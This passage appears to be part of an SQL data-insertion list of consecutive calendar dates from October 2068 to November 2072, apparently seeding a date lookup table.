('2068-10-15'),
('2068-10-16'),
('2068-10-17'),
('2068-10-18'),
('2068-10-19'),
('2068-10-20'),
('2068-10-21'),
('2068-10-22'),
('2068-10-23'),
('2068-10-24'),
('2068-10-25'),
('2068-10-26'),
('2068-10-27'),
('2068-10-28'),
('2068-10-29'),
('2068-10-30'),
('2068-10-31'),
('2068-11-01'),
('2068-11-02'),
('2068-11-03'),
('2068-11-04'),
('2068-11-05'),
('2068-11-06'),
('2068-11-07'),
('2068-11-08'),
('2068-11-09'),
('2068-11-10'),
('2068-11-11'),
('2068-11-12'),
('2068-11-13'),
('2068-11-14'),
('2068-11-15'),
('2068-11-16'),
('2068-11-17'),
('2068-11-18'),
('2068-11-19'),
('2068-11-20'),
('2068-11-21'),
('2068-11-22'),
('2068-11-23'),
('2068-11-24'),
('2068-11-25'),
('2068-11-26'),
('2068-11-27'),
('2068-11-28'),
('2068-11-29'),
('2068-11-30'),
('2068-12-01'),
('2068-12-02'),
('2068-12-03'),
('2068-12-04'),
('2068-12-05'),
('2068-12-06'),
('2068-12-07'),
('2068-12-08'),
('2068-12-09'),
('2068-12-10'),
('2068-12-11'),
('2068-12-12'),
('2068-12-13'),
('2068-12-14'),
('2068-12-15'),
('2068-12-16'),
('2068-12-17'),
('2068-12-18'),
('2068-12-19'),
('2068-12-20'),
('2068-12-21'),
('2068-12-22'),
('2068-12-23'),
('2068-12-24'),
('2068-12-25'),
('2068-12-26'),
('2068-12-27'),
('2068-12-28'),
('2068-12-29'),
('2068-12-30'),
('2068-12-31'),
('2069-01-01'),
('2069-01-02'),
('2069-01-03'),
('2069-01-04'),
('2069-01-05'),
('2069-01-06'),
('2069-01-07'),
('2069-01-08'),
('2069-01-09'),
('2069-01-10'),
('2069-01-11'),
('2069-01-12'),
('2069-01-13'),
('2069-01-14'),
('2069-01-15'),
('2069-01-16'),
('2069-01-17'),
('2069-01-18'),
('2069-01-19'),
('2069-01-20'),
('2069-01-21'),
('2069-01-22'),
('2069-01-23'),
('2069-01-24'),
('2069-01-25'),
('2069-01-26'),
('2069-01-27'),
('2069-01-28'),
('2069-01-29'),
('2069-01-30'),
('2069-01-31'),
('2069-02-01'),
('2069-02-02'),
('2069-02-03'),
('2069-02-04'),
('2069-02-05'),
('2069-02-06'),
('2069-02-07'),
('2069-02-08'),
('2069-02-09'),
('2069-02-10'),
('2069-02-11'),
('2069-02-12'),
('2069-02-13'),
('2069-02-14'),
('2069-02-15'),
('2069-02-16'),
('2069-02-17'),
('2069-02-18'),
('2069-02-19'),
('2069-02-20'),
('2069-02-21'),
('2069-02-22'),
('2069-02-23'),
('2069-02-24'),
('2069-02-25'),
('2069-02-26'),
('2069-02-27'),
('2069-02-28'),
('2069-03-01'),
('2069-03-02'),
('2069-03-03'),
('2069-03-04'),
('2069-03-05'),
('2069-03-06'),
('2069-03-07'),
('2069-03-08'),
('2069-03-09'),
('2069-03-10'),
('2069-03-11'),
('2069-03-12'),
('2069-03-13'),
('2069-03-14'),
('2069-03-15'),
('2069-03-16'),
('2069-03-17'),
('2069-03-18'),
('2069-03-19'),
('2069-03-20'),
('2069-03-21'),
('2069-03-22'),
('2069-03-23'),
('2069-03-24'),
('2069-03-25'),
('2069-03-26'),
('2069-03-27'),
('2069-03-28'),
('2069-03-29'),
('2069-03-30'),
('2069-03-31'),
('2069-04-01'),
('2069-04-02'),
('2069-04-03'),
('2069-04-04'),
('2069-04-05'),
('2069-04-06'),
('2069-04-07'),
('2069-04-08'),
('2069-04-09'),
('2069-04-10'),
('2069-04-11'),
('2069-04-12'),
('2069-04-13'),
('2069-04-14'),
('2069-04-15'),
('2069-04-16'),
('2069-04-17'),
('2069-04-18'),
('2069-04-19'),
('2069-04-20'),
('2069-04-21'),
('2069-04-22'),
('2069-04-23'),
('2069-04-24'),
('2069-04-25'),
('2069-04-26'),
('2069-04-27'),
('2069-04-28'),
('2069-04-29'),
('2069-04-30'),
('2069-05-01'),
('2069-05-02'),
('2069-05-03'),
('2069-05-04'),
('2069-05-05'),
('2069-05-06'),
('2069-05-07'),
('2069-05-08'),
('2069-05-09'),
('2069-05-10'),
('2069-05-11'),
('2069-05-12'),
('2069-05-13'),
('2069-05-14'),
('2069-05-15'),
('2069-05-16'),
('2069-05-17'),
('2069-05-18'),
('2069-05-19'),
('2069-05-20'),
('2069-05-21'),
('2069-05-22'),
('2069-05-23'),
('2069-05-24'),
('2069-05-25'),
('2069-05-26'),
('2069-05-27'),
('2069-05-28'),
('2069-05-29'),
('2069-05-30'),
('2069-05-31'),
('2069-06-01'),
('2069-06-02'),
('2069-06-03'),
('2069-06-04'),
('2069-06-05'),
('2069-06-06'),
('2069-06-07'),
('2069-06-08'),
('2069-06-09'),
('2069-06-10'),
('2069-06-11'),
('2069-06-12'),
('2069-06-13'),
('2069-06-14'),
('2069-06-15'),
('2069-06-16'),
('2069-06-17'),
('2069-06-18'),
('2069-06-19'),
('2069-06-20'),
('2069-06-21'),
('2069-06-22'),
('2069-06-23'),
('2069-06-24'),
('2069-06-25'),
('2069-06-26'),
('2069-06-27'),
('2069-06-28'),
('2069-06-29'),
('2069-06-30'),
('2069-07-01'),
('2069-07-02'),
('2069-07-03'),
('2069-07-04'),
('2069-07-05'),
('2069-07-06'),
('2069-07-07'),
('2069-07-08'),
('2069-07-09'),
('2069-07-10'),
('2069-07-11'),
('2069-07-12'),
('2069-07-13'),
('2069-07-14'),
('2069-07-15'),
('2069-07-16'),
('2069-07-17'),
('2069-07-18'),
('2069-07-19'),
('2069-07-20'),
('2069-07-21'),
('2069-07-22'),
('2069-07-23'),
('2069-07-24'),
('2069-07-25'),
('2069-07-26'),
('2069-07-27'),
('2069-07-28'),
('2069-07-29'),
('2069-07-30'),
('2069-07-31'),
('2069-08-01'),
('2069-08-02'),
('2069-08-03'),
('2069-08-04'),
('2069-08-05'),
('2069-08-06'),
('2069-08-07'),
('2069-08-08'),
('2069-08-09'),
('2069-08-10'),
('2069-08-11'),
('2069-08-12'),
('2069-08-13'),
('2069-08-14'),
('2069-08-15'),
('2069-08-16'),
('2069-08-17'),
('2069-08-18'),
('2069-08-19'),
('2069-08-20'),
('2069-08-21'),
('2069-08-22'),
('2069-08-23'),
('2069-08-24'),
('2069-08-25'),
('2069-08-26'),
('2069-08-27'),
('2069-08-28'),
('2069-08-29'),
('2069-08-30'),
('2069-08-31'),
('2069-09-01'),
('2069-09-02'),
('2069-09-03'),
('2069-09-04'),
('2069-09-05'),
('2069-09-06'),
('2069-09-07'),
('2069-09-08'),
('2069-09-09'),
('2069-09-10'),
('2069-09-11'),
('2069-09-12'),
('2069-09-13'),
('2069-09-14'),
('2069-09-15'),
('2069-09-16'),
('2069-09-17'),
('2069-09-18'),
('2069-09-19'),
('2069-09-20'),
('2069-09-21'),
('2069-09-22'),
('2069-09-23'),
('2069-09-24'),
('2069-09-25'),
('2069-09-26'),
('2069-09-27'),
('2069-09-28'),
('2069-09-29'),
('2069-09-30'),
('2069-10-01'),
('2069-10-02'),
('2069-10-03'),
('2069-10-04'),
('2069-10-05'),
('2069-10-06'),
('2069-10-07'),
('2069-10-08'),
('2069-10-09'),
('2069-10-10'),
('2069-10-11'),
('2069-10-12'),
('2069-10-13'),
('2069-10-14'),
('2069-10-15'),
('2069-10-16'),
('2069-10-17'),
('2069-10-18'),
('2069-10-19'),
('2069-10-20'),
('2069-10-21'),
('2069-10-22'),
('2069-10-23'),
('2069-10-24'),
('2069-10-25'),
('2069-10-26'),
('2069-10-27'),
('2069-10-28'),
('2069-10-29'),
('2069-10-30'),
('2069-10-31'),
('2069-11-01'),
('2069-11-02'),
('2069-11-03'),
('2069-11-04'),
('2069-11-05'),
('2069-11-06'),
('2069-11-07'),
('2069-11-08'),
('2069-11-09'),
('2069-11-10'),
('2069-11-11'),
('2069-11-12'),
('2069-11-13'),
('2069-11-14'),
('2069-11-15'),
('2069-11-16'),
('2069-11-17'),
('2069-11-18'),
('2069-11-19'),
('2069-11-20'),
('2069-11-21'),
('2069-11-22'),
('2069-11-23'),
('2069-11-24'),
('2069-11-25'),
('2069-11-26'),
('2069-11-27'),
('2069-11-28'),
('2069-11-29'),
('2069-11-30'),
('2069-12-01'),
('2069-12-02'),
('2069-12-03'),
('2069-12-04'),
('2069-12-05'),
('2069-12-06'),
('2069-12-07'),
('2069-12-08'),
('2069-12-09'),
('2069-12-10'),
('2069-12-11'),
('2069-12-12'),
('2069-12-13'),
('2069-12-14'),
('2069-12-15'),
('2069-12-16'),
('2069-12-17'),
('2069-12-18'),
('2069-12-19'),
('2069-12-20'),
('2069-12-21'),
('2069-12-22'),
('2069-12-23'),
('2069-12-24'),
('2069-12-25'),
('2069-12-26'),
('2069-12-27'),
('2069-12-28'),
('2069-12-29'),
('2069-12-30'),
('2069-12-31'),
('2070-01-01'),
('2070-01-02'),
('2070-01-03'),
('2070-01-04'),
('2070-01-05'),
('2070-01-06'),
('2070-01-07'),
('2070-01-08'),
('2070-01-09'),
('2070-01-10'),
('2070-01-11'),
('2070-01-12'),
('2070-01-13'),
('2070-01-14'),
('2070-01-15'),
('2070-01-16'),
('2070-01-17'),
('2070-01-18'),
('2070-01-19'),
('2070-01-20'),
('2070-01-21'),
('2070-01-22'),
('2070-01-23'),
('2070-01-24'),
('2070-01-25'),
('2070-01-26'),
('2070-01-27'),
('2070-01-28'),
('2070-01-29'),
('2070-01-30'),
('2070-01-31'),
('2070-02-01'),
('2070-02-02'),
('2070-02-03'),
('2070-02-04'),
('2070-02-05'),
('2070-02-06'),
('2070-02-07'),
('2070-02-08'),
('2070-02-09'),
('2070-02-10'),
('2070-02-11'),
('2070-02-12'),
('2070-02-13'),
('2070-02-14'),
('2070-02-15'),
('2070-02-16'),
('2070-02-17'),
('2070-02-18'),
('2070-02-19'),
('2070-02-20'),
('2070-02-21'),
('2070-02-22'),
('2070-02-23'),
('2070-02-24'),
('2070-02-25'),
('2070-02-26'),
('2070-02-27'),
('2070-02-28'),
('2070-03-01'),
('2070-03-02'),
('2070-03-03'),
('2070-03-04'),
('2070-03-05'),
('2070-03-06'),
('2070-03-07'),
('2070-03-08'),
('2070-03-09'),
('2070-03-10'),
('2070-03-11'),
('2070-03-12'),
('2070-03-13'),
('2070-03-14'),
('2070-03-15'),
('2070-03-16'),
('2070-03-17'),
('2070-03-18'),
('2070-03-19'),
('2070-03-20'),
('2070-03-21'),
('2070-03-22'),
('2070-03-23'),
('2070-03-24'),
('2070-03-25'),
('2070-03-26'),
('2070-03-27'),
('2070-03-28'),
('2070-03-29'),
('2070-03-30'),
('2070-03-31'),
('2070-04-01'),
('2070-04-02'),
('2070-04-03'),
('2070-04-04'),
('2070-04-05'),
('2070-04-06'),
('2070-04-07'),
('2070-04-08'),
('2070-04-09'),
('2070-04-10'),
('2070-04-11'),
('2070-04-12'),
('2070-04-13'),
('2070-04-14'),
('2070-04-15'),
('2070-04-16'),
('2070-04-17'),
('2070-04-18'),
('2070-04-19'),
('2070-04-20'),
('2070-04-21'),
('2070-04-22'),
('2070-04-23'),
('2070-04-24'),
('2070-04-25'),
('2070-04-26'),
('2070-04-27'),
('2070-04-28'),
('2070-04-29'),
('2070-04-30'),
('2070-05-01'),
('2070-05-02'),
('2070-05-03'),
('2070-05-04'),
('2070-05-05'),
('2070-05-06'),
('2070-05-07'),
('2070-05-08'),
('2070-05-09'),
('2070-05-10'),
('2070-05-11'),
('2070-05-12'),
('2070-05-13'),
('2070-05-14'),
('2070-05-15'),
('2070-05-16'),
('2070-05-17'),
('2070-05-18'),
('2070-05-19'),
('2070-05-20'),
('2070-05-21'),
('2070-05-22'),
('2070-05-23'),
('2070-05-24'),
('2070-05-25'),
('2070-05-26'),
('2070-05-27'),
('2070-05-28'),
('2070-05-29'),
('2070-05-30'),
('2070-05-31'),
('2070-06-01'),
('2070-06-02'),
('2070-06-03'),
('2070-06-04'),
('2070-06-05'),
('2070-06-06'),
('2070-06-07'),
('2070-06-08'),
('2070-06-09'),
('2070-06-10'),
('2070-06-11'),
('2070-06-12'),
('2070-06-13'),
('2070-06-14'),
('2070-06-15'),
('2070-06-16'),
('2070-06-17'),
('2070-06-18'),
('2070-06-19'),
('2070-06-20'),
('2070-06-21'),
('2070-06-22'),
('2070-06-23'),
('2070-06-24'),
('2070-06-25'),
('2070-06-26'),
('2070-06-27'),
('2070-06-28'),
('2070-06-29'),
('2070-06-30'),
('2070-07-01'),
('2070-07-02'),
('2070-07-03'),
('2070-07-04'),
('2070-07-05'),
('2070-07-06'),
('2070-07-07'),
('2070-07-08'),
('2070-07-09'),
('2070-07-10'),
('2070-07-11'),
('2070-07-12'),
('2070-07-13'),
('2070-07-14'),
('2070-07-15'),
('2070-07-16'),
('2070-07-17'),
('2070-07-18'),
('2070-07-19'),
('2070-07-20'),
('2070-07-21'),
('2070-07-22'),
('2070-07-23'),
('2070-07-24'),
('2070-07-25'),
('2070-07-26'),
('2070-07-27'),
('2070-07-28'),
('2070-07-29'),
('2070-07-30'),
('2070-07-31'),
('2070-08-01'),
('2070-08-02'),
('2070-08-03'),
('2070-08-04'),
('2070-08-05'),
('2070-08-06'),
('2070-08-07'),
('2070-08-08'),
('2070-08-09'),
('2070-08-10'),
('2070-08-11'),
('2070-08-12'),
('2070-08-13'),
('2070-08-14'),
('2070-08-15'),
('2070-08-16'),
('2070-08-17'),
('2070-08-18'),
('2070-08-19'),
('2070-08-20'),
('2070-08-21'),
('2070-08-22'),
('2070-08-23'),
('2070-08-24'),
('2070-08-25'),
('2070-08-26'),
('2070-08-27'),
('2070-08-28'),
('2070-08-29'),
('2070-08-30'),
('2070-08-31'),
('2070-09-01'),
('2070-09-02'),
('2070-09-03'),
('2070-09-04'),
('2070-09-05'),
('2070-09-06'),
('2070-09-07'),
('2070-09-08'),
('2070-09-09'),
('2070-09-10'),
('2070-09-11'),
('2070-09-12'),
('2070-09-13'),
('2070-09-14'),
('2070-09-15'),
('2070-09-16'),
('2070-09-17'),
('2070-09-18'),
('2070-09-19'),
('2070-09-20'),
('2070-09-21'),
('2070-09-22'),
('2070-09-23'),
('2070-09-24'),
('2070-09-25'),
('2070-09-26'),
('2070-09-27'),
('2070-09-28'),
('2070-09-29'),
('2070-09-30'),
('2070-10-01'),
('2070-10-02'),
('2070-10-03'),
('2070-10-04'),
('2070-10-05'),
('2070-10-06'),
('2070-10-07'),
('2070-10-08'),
('2070-10-09'),
('2070-10-10'),
('2070-10-11'),
('2070-10-12'),
('2070-10-13'),
('2070-10-14'),
('2070-10-15'),
('2070-10-16'),
('2070-10-17'),
('2070-10-18'),
('2070-10-19'),
('2070-10-20'),
('2070-10-21'),
('2070-10-22'),
('2070-10-23'),
('2070-10-24'),
('2070-10-25'),
('2070-10-26'),
('2070-10-27'),
('2070-10-28'),
('2070-10-29'),
('2070-10-30'),
('2070-10-31'),
('2070-11-01'),
('2070-11-02'),
('2070-11-03'),
('2070-11-04'),
('2070-11-05'),
('2070-11-06'),
('2070-11-07'),
('2070-11-08'),
('2070-11-09'),
('2070-11-10'),
('2070-11-11'),
('2070-11-12'),
('2070-11-13'),
('2070-11-14'),
('2070-11-15'),
('2070-11-16'),
('2070-11-17'),
('2070-11-18'),
('2070-11-19'),
('2070-11-20'),
('2070-11-21'),
('2070-11-22'),
('2070-11-23'),
('2070-11-24'),
('2070-11-25'),
('2070-11-26'),
('2070-11-27'),
('2070-11-28'),
('2070-11-29'),
('2070-11-30'),
('2070-12-01'),
('2070-12-02'),
('2070-12-03'),
('2070-12-04'),
('2070-12-05'),
('2070-12-06'),
('2070-12-07'),
('2070-12-08'),
('2070-12-09'),
('2070-12-10'),
('2070-12-11'),
('2070-12-12'),
('2070-12-13'),
('2070-12-14'),
('2070-12-15'),
('2070-12-16'),
('2070-12-17'),
('2070-12-18'),
('2070-12-19'),
('2070-12-20'),
('2070-12-21'),
('2070-12-22'),
('2070-12-23'),
('2070-12-24'),
('2070-12-25'),
('2070-12-26'),
('2070-12-27'),
('2070-12-28'),
('2070-12-29'),
('2070-12-30'),
('2070-12-31'),
('2071-01-01'),
('2071-01-02'),
('2071-01-03'),
('2071-01-04'),
('2071-01-05'),
('2071-01-06'),
('2071-01-07'),
('2071-01-08'),
('2071-01-09'),
('2071-01-10'),
('2071-01-11'),
('2071-01-12'),
('2071-01-13'),
('2071-01-14'),
('2071-01-15'),
('2071-01-16'),
('2071-01-17'),
('2071-01-18'),
('2071-01-19'),
('2071-01-20'),
('2071-01-21'),
('2071-01-22'),
('2071-01-23'),
('2071-01-24'),
('2071-01-25'),
('2071-01-26'),
('2071-01-27'),
('2071-01-28'),
('2071-01-29'),
('2071-01-30'),
('2071-01-31'),
('2071-02-01'),
('2071-02-02'),
('2071-02-03'),
('2071-02-04'),
('2071-02-05'),
('2071-02-06'),
('2071-02-07'),
('2071-02-08'),
('2071-02-09'),
('2071-02-10'),
('2071-02-11'),
('2071-02-12'),
('2071-02-13'),
('2071-02-14'),
('2071-02-15'),
('2071-02-16'),
('2071-02-17'),
('2071-02-18'),
('2071-02-19'),
('2071-02-20'),
('2071-02-21'),
('2071-02-22'),
('2071-02-23'),
('2071-02-24'),
('2071-02-25'),
('2071-02-26'),
('2071-02-27'),
('2071-02-28'),
('2071-03-01'),
('2071-03-02'),
('2071-03-03'),
('2071-03-04'),
('2071-03-05'),
('2071-03-06'),
('2071-03-07'),
('2071-03-08'),
('2071-03-09'),
('2071-03-10'),
('2071-03-11'),
('2071-03-12'),
('2071-03-13'),
('2071-03-14'),
('2071-03-15'),
('2071-03-16'),
('2071-03-17'),
('2071-03-18'),
('2071-03-19'),
('2071-03-20'),
('2071-03-21'),
('2071-03-22'),
('2071-03-23'),
('2071-03-24'),
('2071-03-25'),
('2071-03-26'),
('2071-03-27'),
('2071-03-28'),
('2071-03-29'),
('2071-03-30'),
('2071-03-31'),
('2071-04-01'),
('2071-04-02'),
('2071-04-03'),
('2071-04-04'),
('2071-04-05'),
('2071-04-06'),
('2071-04-07'),
('2071-04-08'),
('2071-04-09'),
('2071-04-10'),
('2071-04-11'),
('2071-04-12'),
('2071-04-13'),
('2071-04-14'),
('2071-04-15'),
('2071-04-16'),
('2071-04-17'),
('2071-04-18'),
('2071-04-19'),
('2071-04-20'),
('2071-04-21'),
('2071-04-22'),
('2071-04-23'),
('2071-04-24'),
('2071-04-25'),
('2071-04-26'),
('2071-04-27'),
('2071-04-28'),
('2071-04-29'),
('2071-04-30'),
('2071-05-01'),
('2071-05-02'),
('2071-05-03'),
('2071-05-04'),
('2071-05-05'),
('2071-05-06'),
('2071-05-07'),
('2071-05-08'),
('2071-05-09'),
('2071-05-10'),
('2071-05-11'),
('2071-05-12'),
('2071-05-13'),
('2071-05-14'),
('2071-05-15'),
('2071-05-16'),
('2071-05-17'),
('2071-05-18'),
('2071-05-19'),
('2071-05-20'),
('2071-05-21'),
('2071-05-22'),
('2071-05-23'),
('2071-05-24'),
('2071-05-25'),
('2071-05-26'),
('2071-05-27'),
('2071-05-28'),
('2071-05-29'),
('2071-05-30'),
('2071-05-31'),
('2071-06-01'),
('2071-06-02'),
('2071-06-03'),
('2071-06-04'),
('2071-06-05'),
('2071-06-06'),
('2071-06-07'),
('2071-06-08'),
('2071-06-09'),
('2071-06-10'),
('2071-06-11'),
('2071-06-12'),
('2071-06-13'),
('2071-06-14'),
('2071-06-15'),
('2071-06-16'),
('2071-06-17'),
('2071-06-18'),
('2071-06-19'),
('2071-06-20'),
('2071-06-21'),
('2071-06-22'),
('2071-06-23'),
('2071-06-24'),
('2071-06-25'),
('2071-06-26'),
('2071-06-27'),
('2071-06-28'),
('2071-06-29'),
('2071-06-30'),
('2071-07-01'),
('2071-07-02'),
('2071-07-03'),
('2071-07-04'),
('2071-07-05'),
('2071-07-06'),
('2071-07-07'),
('2071-07-08'),
('2071-07-09'),
('2071-07-10'),
('2071-07-11'),
('2071-07-12'),
('2071-07-13'),
('2071-07-14'),
('2071-07-15'),
('2071-07-16'),
('2071-07-17'),
('2071-07-18'),
('2071-07-19'),
('2071-07-20'),
('2071-07-21'),
('2071-07-22'),
('2071-07-23'),
('2071-07-24'),
('2071-07-25'),
('2071-07-26'),
('2071-07-27'),
('2071-07-28'),
('2071-07-29'),
('2071-07-30'),
('2071-07-31'),
('2071-08-01'),
('2071-08-02'),
('2071-08-03'),
('2071-08-04'),
('2071-08-05'),
('2071-08-06'),
('2071-08-07'),
('2071-08-08'),
('2071-08-09'),
('2071-08-10'),
('2071-08-11'),
('2071-08-12'),
('2071-08-13'),
('2071-08-14'),
('2071-08-15'),
('2071-08-16'),
('2071-08-17'),
('2071-08-18'),
('2071-08-19'),
('2071-08-20'),
('2071-08-21'),
('2071-08-22'),
('2071-08-23'),
('2071-08-24'),
('2071-08-25'),
('2071-08-26'),
('2071-08-27'),
('2071-08-28'),
('2071-08-29'),
('2071-08-30'),
('2071-08-31'),
('2071-09-01'),
('2071-09-02'),
('2071-09-03'),
('2071-09-04'),
('2071-09-05'),
('2071-09-06'),
('2071-09-07'),
('2071-09-08'),
('2071-09-09'),
('2071-09-10'),
('2071-09-11'),
('2071-09-12'),
('2071-09-13'),
('2071-09-14'),
('2071-09-15'),
('2071-09-16'),
('2071-09-17'),
('2071-09-18'),
('2071-09-19'),
('2071-09-20'),
('2071-09-21'),
('2071-09-22'),
('2071-09-23'),
('2071-09-24'),
('2071-09-25'),
('2071-09-26'),
('2071-09-27'),
('2071-09-28'),
('2071-09-29'),
('2071-09-30'),
('2071-10-01'),
('2071-10-02'),
('2071-10-03'),
('2071-10-04'),
('2071-10-05'),
('2071-10-06'),
('2071-10-07'),
('2071-10-08'),
('2071-10-09'),
('2071-10-10'),
('2071-10-11'),
('2071-10-12'),
('2071-10-13'),
('2071-10-14'),
('2071-10-15'),
('2071-10-16'),
('2071-10-17'),
('2071-10-18'),
('2071-10-19'),
('2071-10-20'),
('2071-10-21'),
('2071-10-22'),
('2071-10-23'),
('2071-10-24'),
('2071-10-25'),
('2071-10-26'),
('2071-10-27'),
('2071-10-28'),
('2071-10-29'),
('2071-10-30'),
('2071-10-31'),
('2071-11-01'),
('2071-11-02'),
('2071-11-03'),
('2071-11-04'),
('2071-11-05'),
('2071-11-06'),
('2071-11-07'),
('2071-11-08'),
('2071-11-09'),
('2071-11-10'),
('2071-11-11'),
('2071-11-12'),
('2071-11-13'),
('2071-11-14'),
('2071-11-15'),
('2071-11-16'),
('2071-11-17'),
('2071-11-18'),
('2071-11-19'),
('2071-11-20'),
('2071-11-21'),
('2071-11-22'),
('2071-11-23'),
('2071-11-24'),
('2071-11-25'),
('2071-11-26'),
('2071-11-27'),
('2071-11-28'),
('2071-11-29'),
('2071-11-30'),
('2071-12-01'),
('2071-12-02'),
('2071-12-03'),
('2071-12-04'),
('2071-12-05'),
('2071-12-06'),
('2071-12-07'),
('2071-12-08'),
('2071-12-09'),
('2071-12-10'),
('2071-12-11'),
('2071-12-12'),
('2071-12-13'),
('2071-12-14'),
('2071-12-15'),
('2071-12-16'),
('2071-12-17'),
('2071-12-18'),
('2071-12-19'),
('2071-12-20'),
('2071-12-21'),
('2071-12-22'),
('2071-12-23'),
('2071-12-24'),
('2071-12-25'),
('2071-12-26'),
('2071-12-27'),
('2071-12-28'),
('2071-12-29'),
('2071-12-30'),
('2071-12-31'),
('2072-01-01'),
('2072-01-02'),
('2072-01-03'),
('2072-01-04'),
('2072-01-05'),
('2072-01-06'),
('2072-01-07'),
('2072-01-08'),
('2072-01-09'),
('2072-01-10'),
('2072-01-11'),
('2072-01-12'),
('2072-01-13'),
('2072-01-14'),
('2072-01-15'),
('2072-01-16'),
('2072-01-17'),
('2072-01-18'),
('2072-01-19'),
('2072-01-20'),
('2072-01-21'),
('2072-01-22'),
('2072-01-23'),
('2072-01-24'),
('2072-01-25'),
('2072-01-26'),
('2072-01-27'),
('2072-01-28'),
('2072-01-29'),
('2072-01-30'),
('2072-01-31'),
('2072-02-01'),
('2072-02-02'),
('2072-02-03'),
('2072-02-04'),
('2072-02-05'),
('2072-02-06'),
('2072-02-07'),
('2072-02-08'),
('2072-02-09'),
('2072-02-10'),
('2072-02-11'),
('2072-02-12'),
('2072-02-13'),
('2072-02-14'),
('2072-02-15'),
('2072-02-16'),
('2072-02-17'),
('2072-02-18'),
('2072-02-19'),
('2072-02-20'),
('2072-02-21'),
('2072-02-22'),
('2072-02-23'),
('2072-02-24'),
('2072-02-25'),
('2072-02-26'),
('2072-02-27'),
('2072-02-28'),
('2072-02-29'),
('2072-03-01'),
('2072-03-02'),
('2072-03-03'),
('2072-03-04'),
('2072-03-05'),
('2072-03-06'),
('2072-03-07'),
('2072-03-08'),
('2072-03-09'),
('2072-03-10'),
('2072-03-11'),
('2072-03-12'),
('2072-03-13'),
('2072-03-14'),
('2072-03-15'),
('2072-03-16'),
('2072-03-17'),
('2072-03-18'),
('2072-03-19'),
('2072-03-20'),
('2072-03-21'),
('2072-03-22'),
('2072-03-23'),
('2072-03-24'),
('2072-03-25'),
('2072-03-26'),
('2072-03-27'),
('2072-03-28'),
('2072-03-29'),
('2072-03-30'),
('2072-03-31'),
('2072-04-01'),
('2072-04-02'),
('2072-04-03'),
('2072-04-04'),
('2072-04-05'),
('2072-04-06'),
('2072-04-07'),
('2072-04-08'),
('2072-04-09'),
('2072-04-10'),
('2072-04-11'),
('2072-04-12'),
('2072-04-13'),
('2072-04-14'),
('2072-04-15'),
('2072-04-16'),
('2072-04-17'),
('2072-04-18'),
('2072-04-19'),
('2072-04-20'),
('2072-04-21'),
('2072-04-22'),
('2072-04-23'),
('2072-04-24'),
('2072-04-25'),
('2072-04-26'),
('2072-04-27'),
('2072-04-28'),
('2072-04-29'),
('2072-04-30'),
('2072-05-01'),
('2072-05-02'),
('2072-05-03'),
('2072-05-04'),
('2072-05-05'),
('2072-05-06'),
('2072-05-07'),
('2072-05-08'),
('2072-05-09'),
('2072-05-10'),
('2072-05-11'),
('2072-05-12'),
('2072-05-13'),
('2072-05-14'),
('2072-05-15'),
('2072-05-16'),
('2072-05-17'),
('2072-05-18'),
('2072-05-19'),
('2072-05-20'),
('2072-05-21'),
('2072-05-22'),
('2072-05-23'),
('2072-05-24'),
('2072-05-25'),
('2072-05-26'),
('2072-05-27'),
('2072-05-28'),
('2072-05-29'),
('2072-05-30'),
('2072-05-31'),
('2072-06-01'),
('2072-06-02'),
('2072-06-03'),
('2072-06-04'),
('2072-06-05'),
('2072-06-06'),
('2072-06-07'),
('2072-06-08'),
('2072-06-09'),
('2072-06-10'),
('2072-06-11'),
('2072-06-12'),
('2072-06-13'),
('2072-06-14'),
('2072-06-15'),
('2072-06-16'),
('2072-06-17'),
('2072-06-18'),
('2072-06-19'),
('2072-06-20'),
('2072-06-21'),
('2072-06-22'),
('2072-06-23'),
('2072-06-24'),
('2072-06-25'),
('2072-06-26'),
('2072-06-27'),
('2072-06-28'),
('2072-06-29'),
('2072-06-30'),
('2072-07-01'),
('2072-07-02'),
('2072-07-03'),
('2072-07-04'),
('2072-07-05'),
('2072-07-06'),
('2072-07-07'),
('2072-07-08'),
('2072-07-09'),
('2072-07-10'),
('2072-07-11'),
('2072-07-12'),
('2072-07-13'),
('2072-07-14'),
('2072-07-15'),
('2072-07-16'),
('2072-07-17'),
('2072-07-18'),
('2072-07-19'),
('2072-07-20'),
('2072-07-21'),
('2072-07-22'),
('2072-07-23'),
('2072-07-24'),
('2072-07-25'),
('2072-07-26'),
('2072-07-27'),
('2072-07-28'),
('2072-07-29'),
('2072-07-30'),
('2072-07-31'),
('2072-08-01'),
('2072-08-02'),
('2072-08-03'),
('2072-08-04'),
('2072-08-05'),
('2072-08-06'),
('2072-08-07'),
('2072-08-08'),
('2072-08-09'),
('2072-08-10'),
('2072-08-11'),
('2072-08-12'),
('2072-08-13'),
('2072-08-14'),
('2072-08-15'),
('2072-08-16'),
('2072-08-17'),
('2072-08-18'),
('2072-08-19'),
('2072-08-20'),
('2072-08-21'),
('2072-08-22'),
('2072-08-23'),
('2072-08-24'),
('2072-08-25'),
('2072-08-26'),
('2072-08-27'),
('2072-08-28'),
('2072-08-29'),
('2072-08-30'),
('2072-08-31'),
('2072-09-01'),
('2072-09-02'),
('2072-09-03'),
('2072-09-04'),
('2072-09-05'),
('2072-09-06'),
('2072-09-07'),
('2072-09-08'),
('2072-09-09'),
('2072-09-10'),
('2072-09-11'),
('2072-09-12'),
('2072-09-13'),
('2072-09-14'),
('2072-09-15'),
('2072-09-16'),
('2072-09-17'),
('2072-09-18'),
('2072-09-19'),
('2072-09-20'),
('2072-09-21'),
('2072-09-22'),
('2072-09-23'),
('2072-09-24'),
('2072-09-25'),
('2072-09-26'),
('2072-09-27'),
('2072-09-28'),
('2072-09-29'),
('2072-09-30'),
('2072-10-01'),
('2072-10-02'),
('2072-10-03'),
('2072-10-04'),
('2072-10-05'),
('2072-10-06'),
('2072-10-07'),
('2072-10-08'),
('2072-10-09'),
('2072-10-10'),
('2072-10-11'),
('2072-10-12'),
('2072-10-13'),
('2072-10-14'),
('2072-10-15'),
('2072-10-16'),
('2072-10-17'),
('2072-10-18'),
('2072-10-19'),
('2072-10-20'),
('2072-10-21'),
('2072-10-22'),
('2072-10-23'),
('2072-10-24'),
('2072-10-25'),
('2072-10-26'),
('2072-10-27'),
('2072-10-28'),
('2072-10-29'),
('2072-10-30'),
('2072-10-31'),
('2072-11-01'),
('2072-11-02'),
('2072-11-03'),
('2072-11-04'),
('2072-11-05'),
('2072-11-06'),
('2072-11-07'),
('2072-11-08'),
('2072-11-09'),
('2072-11-10'),
('2072-11-11'),
('2072-11-12'),
('2072-11-13'),
('2072-11-14'),
('2072-11-15'),
('2072-11-16'),
('2072-11-17'),
('2072-11-18'),
('2072-11-19'),
('2072-11-20'),
('2072-11-21'),
('2072-11-22'),
